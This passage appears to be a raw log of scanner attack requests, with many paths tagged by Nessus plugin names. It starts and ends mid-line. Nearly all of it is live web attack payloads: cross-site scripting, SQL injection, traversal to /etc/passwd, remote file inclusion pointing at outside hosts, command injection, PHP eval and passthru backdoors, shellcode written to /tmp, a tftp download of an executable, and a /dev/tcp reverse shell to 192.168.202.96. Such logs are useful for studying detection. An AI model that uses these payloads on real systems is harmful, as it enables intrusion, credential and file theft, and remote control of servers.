content=\"testiklc=904\">\n/j4rdyhw8.cgi?<script>document.cookie=\"testrluj=1420;\"</script>\n/examples/jsp/cal/download.php?language=/etc/passwd\\x00\n/zv8tv7h8.cgi?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/cgi-bin/mkplog.exe\n/examples/jsp/checkbox/newsdesk.cgi?t=../../../../../../etc/passwd\n/admin/doeditconfig.php?thispath=../includes&config[path]=http://cirt.net/rfiinc.txt?\n/scripts/kvjwnarw.exe\n/en-us/hipkz026.asp?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/scripts/bpk_bsfe_4vq.php3\n/manager/simple/view_page?mv_arg=|cat /etc/passwd|\n/iisadmpwd/..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/ybz5rz7a.php?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/lsoix5h3.idc?<script>cross_site_scripting.nasl</script>\n/scripts/mail.php?id='/**/union/**/select/**/1,2,1332008335,4--&blog=1\n/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.96:8080/4dckqcc0acprbz?'\n/top.php?stuff=&uname >q61988974 #\n/php.cgi?/etc/passwd\n/vmi8bb12.dll?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/examples/jsp/checkbox/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1\n/ows-bin/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/169okeyj.exe?<script>document.cookie=\"testxeoi=3573;\"</script>\n/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332010410',null,null,null,null --\n/javascript/development.exe\n/scripts/include.php\n/bn857frh.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/if69ddo1.x?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/l13b77e5.cfm?<script>document.cookie=\"testjvvf=7721;\"</script>\n/<script>document.cookie=\"testmjct=1867;\"</script>\n/main.php?logout=\"&rm\\xa0q69712395&rem\\xa0\n/en-us/ddoworrl.kspx?<script>document.cookie=\"testvlau=8517;\"</script>\n/javascript/bandwidth.exe\n/<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/examples/jsp/checkbox/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00\n/scripts/detail.asp?nchannel='1\n/main.php?stuff=&ver\\xa0>q18558736&rem\\xa0\n/javascript/.passwd.core\n/examples/servlets/servlet/pfdispaly.cgi?../../../../../../etc/passwd\n/1qwv2p5p.cfc?<script>document.cookie=\"testvqcy=252;\"</script>\n/qhvu0pdg.jspa?<script>document.cookie=\"testchuc=2100;\"</script>\n/m5103snj.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/?\"><script>alert('struts_sa_surl_xss.nasl')</script>\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"\\0367\\0322\\0041\\03201\\0311qqj\\0042j\\0007pq\\0211\\0343\" >> /tmp/ldlchhikup0;echo|awstats826185.txt\n/examples/jsp/sessions/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc\n/fmnveedu.exe?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/help.php?q=\"ping\\x09-w\\x0911000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n<script>document.cookie=\"testswjp=6010;\"</script>\n/manager/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd\n/examples/jsp/cal/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\\x00\n/scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331908709')</script>\n/en-us/jnv890lt.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\\x00&bn=fm_d1\n/iv5vkgam.pl?<script>document.cookie=\"testfosd=94;\"</script>\n/g8nu2yy7.mscgi?<script>cross_site_scripting.nasl</script>\n/scripts/login.wdm\n/en-us/i686v90l.asp?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/help.php?q=\"ping\\x0c-w\\x0c11000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/r3le3om5.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/rbec2ohx.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/d5a5renl.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/ui/login?user=nessus-1331904147\n/javascript/reg.exe\n/scripts/qbch5ojumj32.cfm\n/subscriptions.pl\n/rv98iwjp.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n//</p><body><script src=http://www.example.com/test?rnd=q34447666></script><p>\n/main.php?logout=\"|ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/phpmyadmin//.../.../.../.../.../.../.../.../etc/passwd\n/apavxugx.dll?<script>document.cookie=\"testdnbh=5237;\"</script>\n/l13b77e5.jsp?<script>document.cookie=\"testjvvf=7721;\"</script>\n/usr/extensions/get_tree.inc.php?globals[\\\"root_path\\\"]=http://cirt.net/rfiinc.txt??cmd=id;pwd\n/javascript/document.rtf\n/main.php?stuff='\\x0adel\\x09q89799943\\x09#\n/i7prbs22.cfm?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/script/ident/identification.php?path_inc=@rfiurl\n/606wkcop.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-win/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/l13b77e5.fts?<script>document.cookie=\"testjvvf=7721;\"</script>\n/main.php?stuff=\"rm;q25586458&rem;\n/help.php?q=&ver\\x0b>q84492284&rem\\x0b\n/cgi-bin/index.php?id=mumrj3sj0o'\n/dda2qr7j.php?<script>cross_site_scripting.nasl</script>\n<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/recordings/webadmin.php?show=/etc/passwd\n/zoomstats/libs/dbmax/mysql.php?globals['lib']['db']['path']=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/scripts/forumdata/data/user.idx\n/examples/servlets/servlet/check_user_id.php?user_id=<script>foo</script>\n/9o6g5vkn.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/oasis - 'definitely maybe'/\n/rv98iwjp.dll?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"h\\0300\\0250\\0312fh\\0002\\0000\\0261\\0200\\0211\\0340j\\0020pr\" >> /tmp/ldlchhikup0;echo|awstats765887.txt\n/javascript/.passwd.log\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+10+00+00+00+20+00+00+00+02+00+00+00+16+00+00+00+00+00+00+00+00+00++>>ctdn\n/zroo33l4.cgi?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/phpmyadmin/themes/original/img/s_passwd.png\n/scripts/yfmo7jpwvpv1.html\n/m2fpztty.jsp?<script>cross_site_scripting.nasl</script>\n/subscriptions.xls\n/phpmyadmin/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_cleauhzy]));die;/*\n/javascript/radio.exe\n/en-us/dda2qr7j.php3?<script>cross_site_scripting.nasl</script>\n/script/common.inc.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl?\n/help.php?q=\"&rm,q17457396&rem,\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=9_2hdkockopdzvqva\n/index.php?file=liens&op=\\\"><script>alert('vulnerable');</script>\n/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini\n/cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331923204','5'--\n/examples/jsp/cal/search.php?searchstring=<script>foo</script>\n/fc9t54l7.php?<script>document.cookie=\"testggad=2000;\"</script>\n/phpmyadmin/documentation.html?phpmyadmin=\\x0acat /etc/passwd\\x0a\n/h4bi26jd.nsf?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/i686v90l.do?<script>document.cookie=\"testfutf=1550;\"</script>\n/scripts/lang/lang.php?lang_path=/etc/passwd\\x00\n/606wkcop.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/devs.exe\n/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1332008331\n/cgi-914/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/top.php?stuff=&ver\\x0b>q83761749&rem\\x0b\n/phpmyadmin/man-cgi?section=0&topic=ls;id\n/examples/jsp/sessions/htgrep/file=index.html&hdr=/etc/passwd\n/\\..\\..\\..\\..\\..\\..\\..\\etc/passwd\n/main.php?logout=\"ping\\xa0-w\\xa09000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/main.php?frm_daynight=day&frm_passwd=q15676662&frm_referer=http%3a//192.168.24.202/&frm_user=&scr_height=&scr_width=\n/en-us/account/sources/functions.php?root_path=/etc/passwd\\x00\n/_vti_bin/_vti_aut/author.exe\n/jsp-examples/snp/snoop.jsp;<script>alert('tomcat_snoop_uri_xss.nasl')</script>test.jsp\n/0u75ldxq.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ny1b3qq4.jspa?<script>cross_site_scripting.nasl</script>\n/rpxyx07v.cgi?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/33y9gcqq.exe?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/scs86g1p.jsp?<script>document.cookie=\"testquyx=2820;\"</script>\n/examples/jsp/checkbox/lang/index.php?file=/etc/passwd\n/nuh3zirz.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/db/users.dat\n/main.php?frm_daynight=day&frm_passwd=q78212853&frm_referer=http%3a//192.168.26.202/top.php%3fstuff%3d1861731255&frm_user=&scr_height=&scr_width=\n/scripts/starnet/addons/slideshow_full.php?album_name='1055226403\n/scripts/n4p4f4gtbhia.html\n/main.php?stuff='\\x0asleep 9 #\n/cgi-bin/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\\x00\n/javascript/licenses.exe\n/examples/jsp/cal/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--\n/javascript/gadget.exe\n/twiki/bin/view/main/twikiusers?rev=83 `0<&47-;exec 47<>/dev/tcp/192.168.202.96/8007;sh <&47 >&47 2>&47`#\n/?p4yl04d=../../../../../../../../../../../../../../../../../etc/passwd\n/scripts/wxrdqnkjuwmu.shtml\n/b5xdqgz2.asp?<script>cross_site_scripting.nasl</script>\n/scripts/onwkbtts3uj1.pl\n/x7pclv4s.do?<script>document.cookie=\"testiulz=3709;\"</script>\n/top.php?stuff=\"\\x0asleep 9 #\n/examples/jsp/jsp2/el/catalog.php?action=category_show&id='\n/apavxugx.pl?<script>document.cookie=\"testdnbh=5237;\"</script>\n/examples/jsp/jsp2/jspx/index.php?post=../config/password\n/cacti/nslookup.cgi?query=localhost;id&type=any&ns=\n/cgi-perl/gw5/gwweb.exe?htmlver=aaa&get-context\n/cgi-bin/fom/fom.cgi?cmd=<script>alert('vulnerable')</script>&file=1&keywords=vulnerable\n/?page=tax/tax_form&tax_rate_id=2'\n/cgibin/htimage.exe/path/filename?2,2\n/lmw4r201.htm?<script>document.cookie=\"testwews=8477;\"</script>\n/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.96:8080/frznctvhi0i5?\n/cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('vulnerable')</script>&branch=head\n/subscriptions.xml\n/scripts/1332008522-ror_session_fixation.nasl\n/examples/jsp/jsp2/el/help.php?section='qualiteam_xcart_sql_xss.nasl\n/bangin' it out 2 - scene 1/\n/en-us/account/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/javascript/done.exe\n/odzk29aa.kspx?<script>document.cookie=\"testtfvh=2141;\"</script>\n/javascript/htpasswd.php3\n/g8nu2yy7.php3?<script>cross_site_scripting.nasl</script>\n/webcgi/vssetcookie.exe\n/javascript/movie.exe\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/examples/jsp/checkbox/phf?qalias=x\\x0a/bin/cat /etc/passwd\n/&amp;lt;default&amp;gt;/\n/help.php?q='\\x0asleep\\x098\\x09#\n/course_descripton/\n/?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/examples/jsp/sessions/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\\x00\n/top.php?stuff='\\x0ddel q84295152 #\n/top.php?stuff=ver\\x0c>q62584269&rem\\x0c\n/m2fpztty.kspx?<script>cross_site_scripting.nasl</script>\n/vhzmaia2.x?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/main.php?stuff=\"&sleep\\x0911\\x09#\n/main.php?logout=\"|ping;-w;7000;-n;1;4.3.2.1|rem;\n/examples/jsp/jsp2/jspx/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\\x00\n/o6ebbirj.cfc?<script>cross_site_scripting.nasl</script>\n/cacti/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\\x00\n/t3af3tdz.mscgi?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"ping\\xa0-w\\xa07000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+00+10+00+00+20+00+00+00+00+10+00+00+10+00+00+00+00+00+00+10+00+00++>>esbq\n/phpmyadmin/index.php?cat_select=<script>foo</script>\n/ttxssh2_100beta1/\n/scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,601832871808,4,5,6,7,8,9,10,11--\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.pl\n/transcript/\n/scripts/3hrgytw.exe?/x+/c+tftp -i 192.168.202.118 get wfqdljio oguyjway.exe\n/fpnpp5zg.htm?<meta http-equiv=set-cookie content=\"testyias=101\">\n/0qhcnefz.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\nftp://192.168.23.102/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/7u1pb2xi.php?<meta http-equiv=set-cookie content=\"testlwwz=718\">\n/examples/jsp/checkbox/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/g8nu2yy7.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/xlj7h65o.jsp?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/main.php?stuff='|sleep\\x0910\\x09#\n/javascript/document.rar\n/fcgi-bin/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/msadc/..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/javascript/hacker.exe\n/6dlc2zm9.htm?<script>document.cookie=\"testqpux=4016;\"</script>\n/en-us/account/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd\n/qb2xy9aw.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/catalog.php?action=category_show&id='\n/javascript/.passwd.asmx\n/phpmyadmin/htgrep/file=index.html&hdr=/etc/passwd\n/webcgi/ppdscgi.exe\n/zmvq66jy.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/fr.exe\n/examples/jsp/jsp2/el/awstatstotals.php?sort=\"].phpinfo().exit().$a[\"\n/h4bi26jd.php?<script>document.cookie=\"testhrzx=1150;\"</script>\n/h4bi26jd.do?<script>document.cookie=\"testhrzx=1150;\"</script>\n/cgi-home/c32web.exe/changeadminpassword\n/admin/common/script.legacy.js\n/examples/jsp/jsp2/jspx/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\\x00|\n/javascript/outgoing.exe\n/script/tick/test.php?path_to_code=@rfiurl\n/phorum/admin/header.php?globals[message]=<script>alert('vulnerable')</script>\n/h21y8w52.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/recordings/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\\x00\n/6n7aacgg.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/phf?qnikto=root\\x0acat /etc/passwd \n/manager/dsweb/services/user-1\"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>\n/examples/jsp/checkbox/index.php?module=<script>foo</script>\n/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.118:8080/iroy1gvqrrqu?\n/phpmyadmin/web_store/web_store.cgi?page=../../../../../../etc/passwd\\x00.html\n/examples/jsp/colors/?mod=read&id=../../../../../../../../../../../../../etc/passwd\\x00\n/ydexw8by.cgi?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/h21y8w52.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/33y9gcqq.fts?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n//profiles.php?what=contact&author=ich&authoremail=bla@bla.com&subject=hello&message=text&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\n/examples/jsp/colors/include/theme.inc.php?fullpath=/etc/passwd\\x00\n/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\\\"><script>alert('vulnerable')</script>;\n/examples/servlets/servlet/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1332008335,4--&blog=1\n/javascript/map.exe\n/l13b77e5.asp?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n//........................................................................../../../../../../../../etc/passwd\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+06+00+00+00+00+00+00+00+00+00+00+00+00+00+00+20+00+00+e0+44+41+54+41+00+00++>>ctdn\n/fnwhrxyd.do?<script>cross_site_scripting.nasl</script>\n/cgi-bin/vssetcookie.exe?\n/player.exe\n/javascript/dc.exe\n/javascript/htpasswd.shtml\n/examples/jsp/jsp2/jspx/kb.cgi?view='&lang=en\n/t578vqea.nsf?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/main.php?stuff='&rm q14199491 #\n/javascript/banking.exe\n/vhzmaia2.mscgi?<script>document.cookie=\"testkogj=3979;\"</script>\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/caxpcjpwao.sh'); function v\n/top.php?stuff=\"&rm\\x09q52362944\\x09#\n/scripts_livecontent/\n/en-us/s7qus4g3.exe?<script>cross_site_scripting.nasl</script>\n/subscriptions.htm\n/cgi-perl/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n/top.php?stuff=\"&ver&rem\\xa0\n/xfkun1ku.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/my sister's hot friend - alektra and sara/\n/cacti/direct.php?rf=/etc/passwd\\x00\n/examples/jsp/colors/newsdesk.cgi?t=../../../../../../etc/passwd\n/search-results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/javascript/.htaccess.sfish/'\"\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919200,0x3a,1131566153),3,4,5,6,7,8,9,10,11,12,13,14,15,16\n/o6ebbirj.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/acidscriptv1/\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=q69288598&frm_user=&scr_height=&scr_width=\n/cacti/home/search.asp?nchannel='1\n/apavxugx.jsp?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/t3af3tdz.cfc?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"del\\x0bq12768472&rem\\x0b\n/cgi-bin/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd\n/9ko6m4c8.jsp?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 362784712,2,1572590489,4,5,6,7,8,9,0,1,2,3 --\n/en-us/odzk29aa.php3?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/top.php?stuff='\\x0asleep 10 #\n/scripts/ylrvly9nh_pf.shtml\n/9o6g5vkn.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332009302&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/appscripting/\n/examples/jsp/error/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss.nasl')</script>\n/scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1332009306,1,1,1,1,1,1,1--&blogid=1\n/rbec2ohx.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/../phpmyadmin.gz\n/examples/jsp/colors/index.php?show=/etc/passwd\n/iv5vkgam.php3?<script>document.cookie=\"testfosd=94;\"</script>\n/scripts/search.jsp?q=%\"<script>alert(1331922090)</script>\n/help.php?q=\"&rm\\xa0q16679515&rem\\xa0\n/en-us/jnv890lt.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/open.php\n/texis.exe/?-version\n/scripts/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd\n/javascript/back.exe\n/nyvbv05h.dll?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/scripts/photo/\n/scripts/nryr3lvrjnwx.shtml\n/scripts/admin.php\n/scripts/subsystems/permissions.info.php\n/main.php?stuff=ver >q11736248&rem \n/phpwcms_template/inc_script/frontend_render/navigation/config_html_menu.php?html_menu_dirpath=http://192.168.202.96:8080/4dckqcc0acprbz?\n/scripts/rss.php?blogid=1&profile=../../config/config.properties.php\\x00\n/aj3pf49c.php?<script>document.cookie=\"testnofv=4170;\"</script>\n/examples/jsp/jsp2/jspx/sendtemp.pl?templ=../../../../../etc/passwd\n/en-us/account/index.php?page=/etc/passwd\\x00\n/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 873011444--\n/scripts/admin.php\n/cgi-bin/cgiwrap/<font color=red>\n/search.php?config[\"sipssys\"]=http://192.168.202.118:8080/ghl9il?\n/scripts/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/phpmyadmin/nessus\"><script>alert('mod_perl_status_uri_xss.nasl')</script>\n/examples/jsp/cal/directory.php?dir=;cat /etc/passwd\n/areyouready_transcript/\n/examples/jsp/sessions/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1\n/examples/jsp/jsp2/jspx/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org\n/i686v90l.asp?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/manager/viewcvs.cgi/?cvsroot=<script>foo</script>\n/<script>document.cookie=\"testpcbb=9254;\"</script>\n/igtf0zon.pl?<script>cross_site_scripting.nasl</script>\n/index.php?skin=<script>alert(414566083580)</script>\n/k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor\n/j4drbkil.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/edzaia0i.fts?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/source?v=../../../../../../../../../../etc/passwd\\x00\n/main.php?stuff=\";sleep 7 #\n/etc-passwd/\n/uvazfs7p.idc?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/help.php?q=ping;-w;8000;-n;1;4.3.2.1|rem;\n/help.php?q=\"&rm\\x09q99796972\\x09#\n/script_path/cms/classes/openengine/filepool.php?oe_classpath=http://192.168.202.118:8080/zz5thkvtmlgl??\n/cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1331908888,4--&blog=1\n/script1/\n/syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>\n/includes/photo.php?h=><script>alert(413015585884)</script>\n/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd\n/help.php?q=&ver\\xa0>q88175763&rem\\xa0\n/main.php?logout=\"ping -w 7000 -n 1 4.3.2.1|rem \n/cacti/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd\n/en-us/9kr0ih0v.dll?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/scripts/xuicksry9grj.cgi\n/scripts/shop.plx/page=nessus1705774680\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332010390&lang_crm=../../../../../../../../../../../..//boot.ini\\x00\n/help.php?q=&ver >q66994514&rem \n/main.php?stuff=;rm\\x09q62126743\\x09#\n/main.php?logout=\"\\x0duname\\x09>q83433457\\x09#\n/scripts/rih28haesl0j.sh\n/script_login/\n/javascript/.passwd.swf\n/en-us/hipkz026.htm?<script>document.cookie=\"testyrbs=2855;\"</script>\n/ju0u7kfo.asp?<script>cross_site_scripting.nasl</script>\n/test.php?evalme=eval($_server[http_x_mlalorkmeliqovbay]);\n/help.php?q=rm;q46895114&rem;\n/cgi-bin/embed/day.php?path=/etc/passwd\\x00\n/examples/jsp/cal/sgdynamo.exe?htname=sgdynamo.exe\n/script/index.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?\n/faq.php?action=&type=view&s=&id=-1' union select 0,1005695442,0,0,0,0,0--\n/jujgxwav.mscgi?<script>document.cookie=\"testknim=9383;\"</script>\n/zln2hm2z.aspx?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/phpmyadmin/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00.txt\n/tuwjta1w.idc?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.php\n/?<script>document.cookie=\"testjpdr=9205;\"</script>\n/top.php?stuff=&ver;>q25243259&rem;\n/cgi-bin/wikka.php?wakka=homepage/../../actions/wikkachanges\n/<meta http-equiv=set-cookie content=\"testsory=7676\">\n/calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05\n/cgi-bin/fileseek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd\n/examples/servlets/servlet/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/top.php?stuff=\"&ver\\x0b>q54461117&rem\\x0b\n/main.php?logout=\"\\x0auname #\n/index.php?c=access&a=login&ref_c=nessus\"><script>alert(1186815547)</script>&ref_a=projectpier_login_page_xss.nasl\"><script>alert(882967859)</script>\n/members.asp?sf=\";}alert(223344);function x(){v =\"\n/j4rdyhw8.jspa?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/javascript/deleted.exe\n/recordings/session/login.php?dest=nessus\"><script>alert('ossim_dest_xss.nasl')</script><!-- \n/o6ebbirj.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script_path/pgvnuke/pgvindex.php?document_root/header.php=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/cgi-914/msmmask.exe?mask=/junk334\n/fnwhrxyd.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout='\\x0arm\\x09q55586739\\x09#\n/main.php?stuff='\\x0ddel q67566355 #\n/cgi-bin/www/delivery/ac.php?bannerid=-1331923190+or+1=1+--+';passthru(base64_decode($_server[http_nessus_fi0ljbic]));die;/*\n/javascript/htpasswd.rtf\n/en-us/9kr0ih0v.do?<script>document.cookie=\"testzgnm=1183;\"</script>\n/ygkjkngd.exe?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/examples/jsp/checkbox/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435\n/bin/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/en-us/account/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+20+72+75+6e+20+69+6e+20+44+4f+53+20+6d+6f+64+65+24+00+00+00+00+00+00+00+00++>>esbq\n/b5xdqgz2.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/citizen's guide to crime prevention/\n/magazine-subscriptions_w0qqfromzr4qqsacatz29253qqsocmdzlistingitemlistqqsspagenamezdcpbookstextnonfeat/\n/top.php?stuff=\"&del\\x09q43482464&rem\\x09\n/help.php?q=&rm;q31933452&rem;\n/7dbjwpw6.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/search.jsp?q=%\"<script>alert(1331905049)</script>\n/awstats/awstats.pl?migrate=|echo;/./tmp/vsnlklmgzu0 > /dev/null &;echo|awstats122543.txt\n/javascript/hr.exe\n/cgi-local/fileseek.cgi?foot=;cat /etc/passwd&head=\n/examples/servlets/servlet/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini\n/examples/jsp/checkbox/activatemember?activatecode=&member=\"><script>alert('mvnforum_activatemember_xss.nasl')</script>\n/x2gyorli.cfc?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/vmi8bb12.jspa?<script>document.cookie=\"testlerc=2575;\"</script>\n/esmozg5d.php3?<script>cross_site_scripting.nasl</script>\n/dda2qr7j.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class 